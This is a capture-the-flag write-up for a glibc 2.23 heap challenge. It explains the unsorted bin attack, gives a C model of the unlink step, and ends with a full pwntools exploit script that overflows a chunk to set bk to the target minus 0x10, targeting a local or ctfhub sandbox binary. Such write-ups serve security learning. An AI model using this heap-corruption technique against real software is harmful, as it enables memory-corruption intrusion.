
All that is needed is magic > 28800. An unsorted bin attack fits: it overwrites the contents of an arbitrary address with a very large value, namely the address of the unsorted bin head inside main_arena (a libc address).

Unsortedbin_Attack principle

When a chunk victim is taken off the unsorted bin list, glibc performs bck = victim->bk; unsorted_chunks(av)->bk = bck; bck->fd = unsorted_chunks(av);. The last of these is an 8-byte write of the bin head address to bck+0x10, and bck is read straight out of the chunk's bk field, so whoever controls bk controls the destination.


Overwrite the bk of the chunk sitting in the unsorted bin with magic_addr-0x10.

Here victim is the chunk at 0x129c030.

bck = victim->bk becomes bck = 0x60209c.

unsorted_chunks(av)->bk = bck becomes unsorted_chunks(av)->bk = 0x60209c (the bin now points at our fake chunk; this is harmless as long as no further allocation walks the unsorted bin before we are done).

bck->fd = unsorted_chunks(av) becomes *(0x60209c+0x10) = main_arena+88, i.e. 0x6020ac now holds the address of the unsorted bin head, which is far larger than 28800. Note that 0x6020AC is only 4-byte aligned, so the 8-byte store covers magic and the 4 bytes after it; the low 32 bits of main_arena+88 still satisfy the check.

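The pointer updates above, as an added stand-alone model (not code from the writeup or from the challenge binary): it reproduces the glibc 2.23 unsorted-bin removal step on constructed chunks, corrupts bk the way the exploit does, and shows that the value landing at the target is the bin head address, which is why magic ends up far above 28800. The bin head, heap and .bss are constructed stand-ins, and the optional check models the bck->fd integrity test that glibc 2.29 and later added, which is what makes this attack fail on modern libc.

```c
/* Added example, not code from the writeup or the challenge binary: a
 * stand-alone model of the unsorted-bin removal step in glibc 2.23
 * _int_malloc, showing why victim->bk = target - 0x10 makes the
 * allocator store the bin-head address (main_arena+88 on x86_64) at
 * *target. The heap, bin head and .bss below are constructed stand-ins;
 * no real allocator state is touched. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Same field layout as glibc's struct malloc_chunk: fd at +0x10, bk at +0x18. */
typedef struct malloc_chunk {
    size_t prev_size;
    size_t size;
    struct malloc_chunk *fd;
    struct malloc_chunk *bk;
} mchunk;

/* Stand-in for unsorted_chunks(av). glibc treats the bin head as a chunk
 * whose fd/bk fields are the list pointers; in a real 2.23 x86_64 arena
 * that pseudo-chunk sits at main_arena+88. */
static mchunk unsorted_bin_head;

/* Constructed .bss: the 8 bytes at &fake_bss.fd stand in for magic at
 * 0x6020AC. The 16 bytes before it are read at most, never written. */
static mchunk fake_bss;

/* The three pointer updates glibc 2.23 performs when victim leaves the
 * unsorted bin. check_2_29 models the integrity check newer glibc added
 * (bck->fd must point back at victim), which is why this attack no longer
 * works there. */
static int unsorted_remove(mchunk *bin, mchunk *victim, int check_2_29)
{
    mchunk *bck = victim->bk;
    if (check_2_29 && (bck->fd != victim || victim->fd != bin))
        return -1;              /* real glibc: malloc_printerr() and abort */
    bin->bk = bck;              /* unsorted_chunks(av)->bk = bck */
    bck->fd = bin;              /* stores &bin at (char *)bck + 0x10 */
    return 0;
}

/* Build a one-chunk unsorted bin, corrupt victim->bk the way the exploit's
 * edit() does, run the removal and return what landed in the target. */
uintptr_t unsorted_bin_attack(int check_2_29)
{
    static mchunk heap[4];               /* constructed heap; heap[1] plays chunk 1 */
    mchunk *victim = &heap[1];
    uintptr_t target = (uintptr_t)&fake_bss.fd;   /* the "magic_addr" */

    memset(heap, 0, sizeof heap);
    fake_bss.fd = NULL;
    victim->size = 0x91;                 /* must stay sane: 2.23 range-checks size */
    victim->fd = &unsorted_bin_head;
    victim->bk = &unsorted_bin_head;
    unsorted_bin_head.fd = victim;
    unsorted_bin_head.bk = victim;

    /* The overflow: bk = target - 0x10, because the only write that goes
     * through bk is bck->fd, i.e. 0x10 bytes past wherever bk points. */
    victim->bk = (mchunk *)(target - 0x10);

    if (unsorted_remove(&unsorted_bin_head, victim, check_2_29) != 0)
        return 0;                        /* refused: nothing written */
    return (uintptr_t)fake_bss.fd;       /* == &unsorted_bin_head */
}

/* The challenge's success condition. Any user-space address, and even the
 * low 32 bits of one, is far above 28800. */
int magic_check_passes(uintptr_t magic)
{
    return magic > 28800;
}

int main(void)
{
    uintptr_t v = unsorted_bin_attack(0);
    printf("glibc 2.23 model: target <- %#lx (bin head at %p): magic check %s\n",
           (unsigned long)v, (void *)&unsorted_bin_head,
           magic_check_passes(v) ? "passes" : "fails");
    printf("with the 2.29+ bck->fd check: %s\n",
           unsorted_bin_attack(1) ? "written" : "unlink refused, no write");
    return 0;
}
```

The value written is not controllable; it is always the bin head address, so the primitive only helps where "some large number" is enough (as here) or where a libc pointer at a known spot is itself useful. The side effect on the bin (its bk now points at the fake chunk) is also why the exploit triggers the magic path immediately after the allocation rather than allocating again.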

EXP

from pwn import *
import sys

context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]

debug = 1
if debug:
    p = process('./pwn')
    elf = ELF('./pwn')
    # p = process('', env={'LD_PRELOAD':'./libc.so'})
    # gdb.attach(p)
else:
    p = remote('challenge-cd5c5d30f5eb3ab2.sandbox.ctfhub.com', 24782)
    elf = ELF('./pwn')
# -----------------------------------------------------------------------
s = lambda data: p.send(data)
sa = lambda text, data: p.sendafter(text, data)
sl = lambda data: p.sendline(data)
sla = lambda text, data: p.sendlineafter(text, data)
r = lambda num=4096: p.recv(num)
rl = lambda text: p.recvuntil(text)
pr = lambda num=4096: sys.stdout.write(p.recv(num).decode(errors='replace'))
inter = lambda: p.interactive()
l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00'))
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
# -----------------------------------------------------------------------
libc = ELF('./libc-2.23.so')

# Menu wrappers: 1 = add, 2 = delete, 3 = show, 4 = edit
def add(size, content):
    rl(">> ")
    sl('1')
    rl("Size: ")
    sl(str(size))
    rl("Content: ")
    sl(content)

def show(index):
    rl(">> ")
    sl('3')
    rl("Index:\n")
    sl(str(index))

def delete(index):
    rl(">> ")
    sl('2')
    rl("Index:\n")
    sl(str(index))

def edit(index, size, content):
    rl(">> ")
    sl('4')
    rl("Index:\n")
    sl(str(index))
    rl("Size:\n")
    sl(str(size))
    rl("Content:\n")
    sl(content)

gdb.attach(p)
add(0x20, 'aaa')   # idx 0: 0x30 chunk, the one we overflow from
add(0x80, 'aaa')   # idx 1: 0x90 chunk, the future unsorted-bin victim
add(0x10, 'aaa')   # idx 2: keeps chunk 1 away from top so free() does not merge it
delete(1)          # chunk 1 -> unsorted bin, fd = bk = main_arena+88

# Edit chunk 0 with size -1 so the write runs past it into chunk 1's header:
# 4 qwords of chunk 0 data + prev_size, then size 0x91 (kept valid so the
# size check in _int_malloc passes), fd, and bk = magic_addr - 0x10 so that
# bck->fd lands exactly on magic (0x6020AC).
edit(0, -1, p64(0) * 5 + p64(0x91) + p64(0) + p64(0x6020AC - 0x10))
pause()
add(0x80, 'a')     # takes chunk 1 out of the unsorted bin: *0x6020AC = main_arena+88
pause()
rl(">> ")
sl('1024')         # the menu path gated on magic > 28800
inter()

To turn the contents of some address into a very large value, an unsorted bin attack does the job:

set the bk of the chunk in the unsorted bin to target_addr-0x10,

where target_addr is the target address. On the next allocation that takes the chunk out of the bin, target_addr receives the address of the unsorted bin head (main_arena+88 on glibc 2.23 x86_64). The value is not controllable, and glibc 2.29 and later check bck->fd before the unlink, so this only works on older libc.